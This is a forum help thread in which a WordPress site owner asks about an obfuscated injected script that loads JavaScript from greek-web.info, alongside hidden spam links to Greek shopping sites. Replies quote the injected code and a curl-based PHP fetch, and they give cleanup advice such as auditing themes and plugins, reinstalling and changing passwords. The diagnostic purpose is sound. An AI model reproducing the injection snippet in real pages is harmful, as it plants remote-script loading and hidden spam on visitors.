: My website has a script which loads from www.greek-web.info/jquery.min.js. How did it get there? I've made a website that has inside this script: <script type="text/javascript"> if(!document.referrer
I've made a website that has inside this script:
<script type="text/javascript">
if(!document.referrer || document.referrer == '') {
document.write('<scr'+'ipt type="text/javascript"
src="http://www.greek-web.info/jquery.min.js"></scr'+'ipt>');
}
else {
document.write('<scr'+'ipt type="text/javascript"
src="http://www.greek-web.info/jquery.js"></scr'+'ipt>');
}
</script>
and loads these links:
ελαστικα
κοσμηματα
επιπλα
γαμος
ρολογια
καλλυντικα
κουζινες
It's impossible to find it inside the code. Does anyone know what it is or has experienced these problems?
I'm using Wordpress.
More posts by @Annie201
5 Comments
Sorted by latest first Latest Oldest Best
You have not been hacked on your server, you have installed a plugin or theme which has the code in it. You need to check all plugins and the theme you are using for the following:
if(function_exists('curl_init'))
{
$url = "http://www.greek-web.info/jquery-1.6.3.min.js";
and simply replace it with:
if(function_exists('curl_init'))
{
$url = "";
It could very easily be the theme you are using. Many free Wordpress themes out there insert spammy code and links. If you see any references to base64_decode in the theme files it is almost certainly this.
Try changing back to the default theme and see if the bad code still appears. You can also check with the Theme Authenticity Checker plugin.
You're using Wordpress? Yes, you got hacked. If you don't keep Wordpress actively updated once you get hacked even updating won't stop them from getting back in once a backdoor is created.
Steps to fix:
Check your database for any malicious code or otherwise bad data and remove any if found
Check your author list. Delete any that aren't known to you.
Back up your database
Uninstall Wordpress completely. That means deleting every file.
Install the latest copy of Wordpress
Restore your database
Change your admin password
Have any authors change their password (or better yet, change it for them and then let them go in and change it to something they can remember)
I just looked at the page source,
<script type="text/javascript"> if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://www.greek-web.info/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://www.greek-web.info/jquery.js"></scr'+'ipt>'); } </script>
<div style="position:fixed;margin-top:-30px;">
<a href="http://www.memmos.com.gr/">ελαστικα</a>
<a href="http://www.asimenio.gr/">κοσμηματα</a>
<a href="http://www.protypo.gr/">επιπλα</a>
<a href="http://www.gamoskaixara.gr/">γαμος</a>
<a href="http://www.oragiadora.gr/">ρολογια</a>
<a href="http://www.mybeautyshop.gr/">καλλυντικα</a>
<a href="http://www.oikozin.com/">κουζινες</a>
What bothers me is this:
if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://www.greek-web.info/jquery.min.js"></scr'+'ipt>');
That looks like purposeful doings, which leads me to believe someone has access to your server via maybe a WordPress vulnerability and has inserted this (and perhaps other) malicious code in your site. What happens if you remove it?
If you found this in the code which only you have access to (as per comments in original post) and didn't input it yourself then it sounds like you have been hacked.
Change your passwords and think about restarting.
Terms of Use Create Support ticket Your support tickets Stock Market News! © vmapp.org2024 All Rights reserved.